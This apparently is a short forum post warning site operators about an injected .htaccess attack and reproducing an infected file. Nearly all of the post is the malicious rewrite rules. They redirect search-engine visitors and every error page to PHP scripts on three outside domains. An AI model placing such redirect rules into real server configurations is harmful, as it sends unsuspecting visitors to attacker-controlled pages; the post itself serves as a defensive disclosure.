Heads up on a server attack
http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/
This appears to be gaining ground.
The attacker gets to append several lines to .htaccess as below.
This is a file that appears to have been attacked three times.
Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://ahmetekremkaya.com/wp-content/themes/my/z.php [R,L]
ErrorDocument 400 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 401 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 403 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 404 http://ahmetekremkaya.com/wp-content/themes/my/z.php
ErrorDocument 500 http://ahmetekremkaya.com/wp-content/themes/my/z.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://experience7.ca/fr/images/tr.php [R,L]
ErrorDocument 400 http://experience7.ca/fr/images/tr.php
ErrorDocument 401 http://experience7.ca/fr/images/tr.php
ErrorDocument 403 http://experience7.ca/fr/images/tr.php
ErrorDocument 404 http://experience7.ca/fr/images/tr.php
ErrorDocument 500 http://experience7.ca/fr/images/tr.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://ecmcorpusa.com/t/tr.php [R,L]
ErrorDocument 400 http://ecmcorpusa.com/t/tr.php
ErrorDocument 401 http://ecmcorpusa.com/t/tr.php
ErrorDocument 403 http://ecmcorpusa.com/t/tr.php
ErrorDocument 404 http://ecmcorpusa.com/t/tr.php
ErrorDocument 500 http://ecmcorpusa.com/t/tr.phpIt seems to be exploiting some Apache vulnerability that allows text files to be written to. We have found these on three different sites in the past week
View full post on Tycoon Talk
Attack, Heads, server
RSS Site Feed